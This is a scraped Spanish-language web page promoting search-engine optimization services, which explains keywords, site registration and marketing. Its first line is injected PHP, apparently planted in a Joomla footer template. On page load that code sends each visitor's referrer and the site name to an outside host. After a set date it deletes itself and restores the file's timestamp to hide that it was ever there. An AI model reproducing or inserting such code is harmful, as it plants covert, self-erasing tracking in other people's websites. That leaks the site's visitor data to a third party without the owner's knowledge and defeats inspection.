check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456737897){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776908&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_footer/tmpl/footer.php"); } SEO Optimización de sitios para motores de búsqueda

Consiga un mejor posicionamiento de su sitio web en los buscadores más importantes.


Usted se preguntará: ¿Cómo puedo obtener un mejor posicionamiento en los buscadores? ¿Cómo hago para que mi sitio web aparezca en los buscadores?

SEO "Search Engine Optimization" ayuda a obtener un mejor ranking luego de una investigación, optimización y registro de su sitio web en los buscadores.
Existen algunas herramientas que permiten la optimización de su sitio para obtener mejor ranking en internet.

¿Cómo optimizar para los motores de búsqueda?

Básicamente, optimizar tu diseño e incluir tu Web site en los motores de búsqueda. Se deben tener en cuenta las piezas externas e internas de un sitio web. En la parte externa, el sitio debe ser fácil de navegar y la información debe ser encontrada fácilmente. En la parte interna, debe ser optimizado con las palabras claves correctas relacionadas con el contenido del sitio.
Al registrar su sitio en los motores de búsqueda, el usuario que utiliza ese motor de busqueda podrá encontrar su sitio.

Esta tarea requiere de un plan de marketing, el cual utiliza diversas técnicas de posicionamiento para conseguir estas buenas posiciones en los resultados del buscador.

Muchas compañías saben que aparecer en las primeras posiciones dentro de estos resultados puede reportarles excelentes beneficios. Hay ocasiones en los que el usuario busca un determinado servicio, y estar en una buena posición puede significar un cliente casi seguro. Por ello, la inversión realizada en los servicios de un 'SEO' profesional puede ser recuperada en poco tiempo.

Muchas veces se asume que por el hecho de tener un sitio web, éste va a generar tráfico de visitas, pero eso no es correcto. Uno puede tener el mejor sitio web con el mejor diseño y sin embargo no generar ninguna visita. Hay millones de sitios en internet y esperar que alguien encuentre el suyo por casualidad sería como buscar una aguja en un pajar.

Cada buen negocio requiere un buen marketing y los sitios web no son una excepción. Por lo tanto recomendamos un buen marketing de rankeo en los buscadores.

¿Desea saber más sobre SEO?